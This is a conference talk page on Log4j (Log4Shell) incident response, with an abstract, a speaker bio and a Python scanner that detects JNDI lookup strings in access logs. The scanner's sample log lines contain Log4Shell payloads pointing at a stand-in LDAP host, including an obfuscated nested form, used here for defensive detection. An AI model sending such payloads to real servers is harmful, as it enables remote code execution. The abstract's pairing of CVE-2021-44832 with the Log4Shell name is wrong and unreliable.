CypherCon 2022

Log4j From the Trenches

Max Thauer

Abstract:

As your company winds down for the holiday season, like clockwork, another fresh CVE with publicly available exploit code drops. The Apache Log4j exploit (CVE-2021-44832), also dubbed Log4Shell, had widespread fallout as a result of the exploit being made publicly available, and organizations are still dealing with the associated problems even months later. This talk will discuss three unique scenarios observed as a result of Log4j being exploited on VMware Horizon servers, including 1) exploitation for persistent access via a webshell, 2) exploitation leading to a Cobalt Strike beacon, and 3) exploitation leading to a cryptocurrency miner. The talk will demonstrate the exploit chain, the artifacts of each investigation, and how you can detect the activity in your network using commercially available tools such as Microsoft Defender ATP, CrowdStrike Falcon, Carbon Black, and FireEye HX. On top of that, sources for threat intelligence pertinent to these types of attacks will be discussed, as well as prevention mechanisms.
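As an added illustration of the log-side detection the abstract alludes to (this is example code written for this page, not material from the talk or from Mandiant), the following Python scanner looks for the JNDI lookup string that Log4Shell requests carry in fields that end up in Log4j messages, such as the User-Agent. Because Log4j resolves nested lookups before the JNDI lookup runs, a scanner that only matches the literal text `${jndi:` misses requests that hide the keyword behind `${lower:...}`, `${upper:...}` or the `${x:-default}` syntax, so the example normalizes those forms (and one layer of URL encoding) before matching. The access-log lines, hostnames and IP addresses are constructed for the example; the set of lookup forms handled is an assumption limited to the three named above.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not from the talk). Lines 1 and 2 carry a
# JNDI lookup in the User-Agent field, the second one nested to evade a literal
# match; line 3 is a benign request.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [15/Dec/2021:10:01:22 +0000] "GET /portal/ HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [15/Dec/2021:10:02:05 +0000] "GET /portal/ HTTP/1.1" 200 512 '
    '"-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - [15/Dec/2021:10:03:40 +0000] "GET /portal/ HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: no further '$', '{' or '}' inside the braces.
NESTED_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The lookup that actually triggers Log4Shell; Log4j lower-cases the prefix,
# so the match is case-insensitive.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_lookup(inner: str) -> Optional[str]:
    """Mimic how Log4j resolves the lookup forms attackers nest to hide 'jndi'.

    Returns the resolved text, or None to leave an unknown lookup untouched.
    """
    if ":-" in inner:                      # ${anything:-default} -> default
        return inner.split(":-", 1)[1]
    name, _, arg = inner.partition(":")
    if name.lower() == "lower":            # ${lower:J} -> j
        return arg.lower()
    if name.lower() == "upper":            # ${upper:j} -> J
        return arg.upper()
    return None


def normalize(text: str, max_rounds: int = 16) -> str:
    """Collapse nested lookups from the inside out, as Log4j would before the
    JNDI lookup fires. Bounded so a pathological input cannot loop forever."""
    text = unquote(text)                   # one layer of %-encoding
    for _ in range(max_rounds):
        changed = False

        def replace(match: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = NESTED_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line, after normalization, contains a JNDI lookup."""
    return bool(JNDI_LOOKUP.search(normalize(line)))


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized line) for every hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if is_log4shell_probe(line):
            hits.append((number, normalize(line)))
    return hits


if __name__ == "__main__":
    for number, line in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: {line}")
```

Run on its own, the block reports lines 1 and 2 of the constructed sample and shows the de-obfuscated form of line 2, which is the value an analyst wants to pivot on (the LDAP host the lookup points at). A production rule would extend `_resolve_lookup` with the other lookup prefixes Log4j supports and feed the normalized line into the EDR or SIEM correlation the talk covers.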

Max Thauer

dog-lover, man’s best friend!

Max Thauer is an incident response senior consultant at Mandiant. His job entails helping clients navigate through security incidents involving ransomware, APT investigations, employee misuse, and web exploitation. Max’s primary skillset falls within the realms of EDR technologies, host-based digital forensics, log analysis and malware analysis.